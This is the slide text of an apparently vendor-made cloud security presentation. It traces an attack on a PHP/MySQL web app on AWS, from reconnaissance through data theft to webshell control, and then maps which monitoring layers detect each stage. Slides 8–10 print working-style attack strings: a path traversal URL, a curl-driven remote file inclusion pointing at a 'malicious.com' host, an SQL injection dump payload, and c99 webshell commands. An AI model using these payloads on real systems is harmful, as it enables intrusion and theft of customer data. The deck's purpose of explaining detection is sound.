Realities of Security in the Cloud

Realities of Security in the Cloud

• 1.
  REALITIES OF SECURITY IN THECLOUD
• 2.
  Security is achallenge.
• 3.
  Security Has Changed
• 4.
  Security in theCloud is a Shared Responsibility PROVIDES • Secure coding and best practices • Software and virtual patching • Configuration management • Access management • Application level attack monitoring • Access management • Patch management • Configuration hardening • Security monitoring • Log analysis • Network threat detection • Security monitoring • Logical network segmentation • Perimeter security services • External DDoS, spoofing, and scanning prevented • Hardened hypervisor • System image library • Root access for customer • Configuration best practices
• 5.
  Let’s talk aboutsecurity coverage.
• 6.
  Tame the Beast IndustryChallenge: The Good, the Bad and the Ugly Known Good Known Bad Suspicious Allow Identify | Tune | Permit Block Drop | Reconfigure Application Stack Web Apps Server-side Apps App Frameworks Dev Platforms Databases Server OS Hypervisor Hardware Classification Action HUMAN EXPERT REQUIRED
• 7.
  Classic 3-Tier WebApplication Key Target Assets Key target assets for attack Across the Full Stack 1. Custom application 2. Web server implementation Apache, IIS, NGINGX 3. Application server implementation Tomcat, Jboss, Jetty, ASP 4. Web server frameworks and languages Struts, PHP, Java 5. Databases mySql, Oracle, MSSQL,.. 6. AWS services IAM, EC2, S3 EC2 instances EC2 instances VPC Route 53 Users Internet gateway ELB DB instance DB instance AvailabilityzoneAAvailabilityzoneB Auto scaling group Web App Server Auto scaling group S3 EC2 instances EC2 instances
• 8.
  An attack scenario- Recon VPC Route 53 Internet gateway ELB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB S3 Bastion Host PHP Application On Linux 1 – Performs low-frequency app-scan 2 – Tests path traversal and enumerates directories 3 – Tests remote file inclusion Recon Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=.. /../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site- import/admin/page.php> Attacker learnings: vulnerable PHP/mySql app, prone to both smash’n grab attacks as more persistent attack approaches
• 9.
  Entry and dataexfiltration • Attacker launches a series of SQL-I injection discovery attempts • Gets a dump-in-one-shot attack and gets full table return http://victim.com/report.php?id=23 and(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a) Attacker achievements: obtained sensitive customer-data without need for local process or system breaches on servers An attack scenario – opportunistic exfiltration VPC Route 53 Internet gateway ELB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB S3 Bastion Host PHP Application On Linux 4 - SQL-I data extraction attack Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=../../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site-import/admin/page.php> Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks as more persistent attack approaches Entry/Exfil
• 10.
  VPC Route 53 Internet gateway ELB mySQL instance Onlinux AvailabilityzoneAAvailabilityzoneB S3 Bastion Host PHP Application On Linux 5 - Webshell injection 6 - Commanding through Shell Command and control (C&C) • Attacker uploads c99 webshell via RFI vulnerability • Persistent foothold for lateral movement established curl -X POST -F 'act=search' -F 'grep=' -F 'fullhexdump=' -F 'base64=' -F 'nixpasswd=' -F 'pid=' -F 'c=' -F 'white=' -F 'sig=' -F 'processes_sort=' -F 'd=/var/www/' -F 'sort=' -F 'f=' -F 'ft=' http [://] mysite [dot] com/path/to/c99 Attacker achievements: obtained foothold for further action and lateral movement Entry and data exfiltration • Attacker launches a series of SQL-I injection attempts • Gets a dump-in-one-shot attack and gets full table return Attacker achievements: obtained sensitive customer-data without need for local process or system breaches on servers Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=../../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability (RFI) Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks as more persistent attack approaches An attack scenario – persistent foothold Command and control
• 11.
  Deep Application threat visibility Network inspection Expert SOC Analysisof Findings Network, system, application infrastructure threat visibility Alert Logic’s Approach Cloudtrail Config&VulnAssessment Foundation Asset and exposure visibility Log Collection HTTP Inspection Expert Curation, R&D of Content and Intel Analytics and Machine Learning Content and Intel Application level Web Attacks OWASP Top 10 Attacks against vulnerable platforms and libraries Attacks against miscon- figurations
• 12.
  Coverage needed forthis scenario Low slow scan Path traver sal RFI SQLi Web shell Recon Entry Exfil C&C Cloudtrail Overall combined coverage scorecard No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage How much can we see?
• 13.
  Coverage needed forthis scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Recon Entry Exfil C&C Cloudtrail Config&VulnAssessment Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
• 14.
  Network, system, application infrastructure threat visibility Coverage neededfor this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Network inspection providers visibility on attacker actions on the known vulnerabilities exploited in the attack and their success Recon Entry Exfil C&C Network inspection Cloudtrail Config&VulnAssessment Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
• 15.
  Deep Application threat visibility Network, system, application infrastructure threat visibility Coverageneeded for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Network inspection providers visibility on attacker actions on the known vulnerabilities exploited in the attack and their success Deep HTTP inspection on requests and responses, learning and anomaly detection deepens coverage for whole classes of application attacks Recon Entry Exfil C&C Network inspection Cloudtrail Config&VulnAssessment Log Collection HTTP Inspection Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
• 16.
  SECURITY EXPERTS Integrated Security Model Incident Investigation System Visual| Context | Hunt Data & Event Sources Assets | Config | Logs Automatic Detection Block | Alert | Log ML Algorithms Rules & Analytics Security Researchers Data Scientists Software Programmers Integrated: Infrastructure | Content | Human Experts Security Analysts
• 17.
  We designed securityfor cloud and hybrid environments GET STARTED IN MINUTES MAINTAIN COVERAGE AT CLOUD SCALE KEEP PRODUCTION FLOWING with modular services that grow with you Comply with integration to cloud APIs and DevOps automation with auto-scaling support and out-of-band detection Single pane of glass for workload and application security across cloud, hosted & on-premises
• 18.
  Leaders 28 8 6 4 10 25 3 5 5 11 8 10 15 24 Other Amazon Check Point Chronicle Data Cisco Fortinet IntelSecurity Okta Symantec Barricade JumpCloud Evident.io Palerra Microsoft CloudPassage CloudCheckr FortyCloud ThreatStack Alert Logic A recognized security leader “Alert Logic has a head start in the cloud, and it shows.” PETER STEPHENSON SC Magazine review “…the depth and breadth of the offering’s analytics and threat management process goes beyond anything we’ve seen…”Who is your primary in-use vendor for Cloud Infrastructure Security? Who are the top vendors in consideration for Cloud Infrastructure Security? Alert Logic
• 19.
  Over 4,000 worldwidecustomers AUTOMOTIVE HEALTHCARE EDUCATION FINANCIAL SERVICES MANUFACTURING MEDIA/PUBLISHING RETAIL/E-COMMERCE ENERGY & CHEMICALS TECHNOLOGY & SERVICES GOV’T / NON-PROFIT
• 20.
  Thank You.